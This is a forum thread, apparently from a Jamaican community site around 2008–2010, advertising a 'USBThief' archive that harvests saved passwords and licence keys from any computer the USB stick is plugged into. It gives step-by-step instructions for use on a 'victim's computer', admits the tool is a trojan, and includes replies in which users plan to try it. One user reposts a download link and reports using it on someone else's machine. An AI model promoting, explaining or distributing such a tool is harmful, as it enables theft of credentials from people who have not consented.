Tweaked USB that steals every passwords including licences.
Instructions 1.Decompress the archive and put all the files located in the folder "USBThief"into a USB. (You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...) 2.Insert the USB in your victim's computer. 3.View folder "dump" to see the passwords.
It also makes a second dump folder in the batexe folder.
Tested and Working perfectly! It will be reported as a trojan or something since it is, but for your benifit, so dont tell me it gave u a virus.
mi nah try dis nexx ting collect my info an gi yuh
viper_3kj said
19:44 03/05 2008
mad software
jamaican5star said
21:56 03/05 2008
wonda if mi fi really try this ... lol
Mellow_Moods said
22:53 03/05 2008
dat sounds like a dream.....
Pimping said
09:03 03/11 2008
Sound maaad. Me ago try it.
DJ O.P. said
09:04 03/11 2008
mi a stay far from dat
14:16 03/11 2008
dj op yuh 2 funny
jr1 said
02:09 03/12 2008
mi a go try it
bad4life71 said
12:11 03/29 2008
repost it yute link nah wuk
imperialsoundz said
04:53 01/15 2010
New Link Right Ya So
http://www.mediafire.com/?yiwo4wemmk2
doops said
11:46 01/15 2010
rayonxelnt said
13:24 01/15 2010
it nuh work pan vista r windows 7 norton pick it up too
MZHearTless said
13:26 01/15 2010
Esko said
01:28 01/16 2010
mi a pree
imperialsoundz said
10:48 01/17 2010
It Workx..Pops Up As Trojanz Though
Jamdon_1 said
18:30 01/26 2010
Mi nah try dat
DJ Scrappy said
21:37 02/04 2010
sound like a my password this wuda thief fi smaddy else :\ nah try that
Mario P said
21:40 02/04 2010
Mi ago try it.
imperialsoundz said
18:11 02/19 2010
Scrappy Mi An All Min Pheel So.... So Me Check It Out Pon Smaddy Else Computer... It Doesn't Make Any Network Connections..It Saves Everythign To A FOlder Named Dump > [Computername]
USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.
Instructions
1.Decompress the archive and put all the files located in the folder "USBThief"into a USB. (You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply c/p ...)
2.Insert the USB in your victim's computer.
3.View folder "dump" to see the passwords.
It also makes a second dump folder in the batexe folder.
Tested and Working perfectly! It will be reported as a trojan or something since it is, but for your benifit, so dont tell me it gave u a virus.
Download: